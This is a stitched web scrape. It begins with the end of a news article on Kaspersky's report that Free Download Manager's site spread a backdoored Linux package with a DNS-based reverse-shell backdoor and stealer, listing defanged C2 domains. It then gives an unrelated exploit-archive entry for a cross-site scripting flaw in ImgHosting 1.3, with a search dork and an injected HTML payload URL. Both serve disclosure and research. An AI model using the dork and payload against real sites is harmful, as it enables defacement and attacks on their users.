It's suspected that the malware authors engineered the attack based on certain predefined filtering criteria (say, a digital fingerprint of the system) to selectively lead potential victims to the malicious version. The rogue redirects ended in 2022 for inexplicable reasons.

The Debian package contains a post-install script that's executed upon its installation to drop two ELF files, /var/tmp/bs and a DNS-based backdoor (/var/tmp/crond) that launches a reverse shell to a command-and-control (C2) server, which is received in response to a DNS request to one of the four domains -

*   2c9bf1811ff428ef9ec999cc7544b43950947b0f.u.fdmpkg\[.\]org
*   c6d76b1748b67fbc21ab493281dd1c7a558e3047.u.fdmpkg\[.\]org
*   0727bedf5c1f85f58337798a63812aa986448473.u.fdmpkg\[.\]org
*   c3a05f0dac05669765800471abc1fdaba15e3360.u.fdmpkg\[.\]org

"The communication protocol is, depending on the connection type, either SSL or TCP," the researchers said. "In the case of SSL, the crond backdoor launches the /var/tmp/bs executable and delegates all further communications to it. Otherwise, the reverse shell is created by the crond backdoor itself."

The ultimate goal of the attack is to deploy a stealer malware and harvest sensitive data from the system. The collection information is then uploaded to the attacker's server using an uploader binary downloaded from the C2 server.

crond, Kaspersky said, is a variant of a backdoor known as Bew that has been in circulation since 2013, while an early version of the Bash stealer malware was previously documented by Yoroi in June 2019.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

It's not immediately clear how the compromise actually took place and what the end goals of the campaign were. What's evident is that not everyone who downloaded the software received the rogue package, enabling it to evade detection for years.

"While the campaign is currently inactive, this case of Free Download Manager demonstrates that it can be quite difficult to detect ongoing cyberattacks on Linux machines with the naked eye," the researchers said.

"Thus, it is essential that Linux machines, both desktop and server, are equipped with reliable and efficient security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

Tag

#debian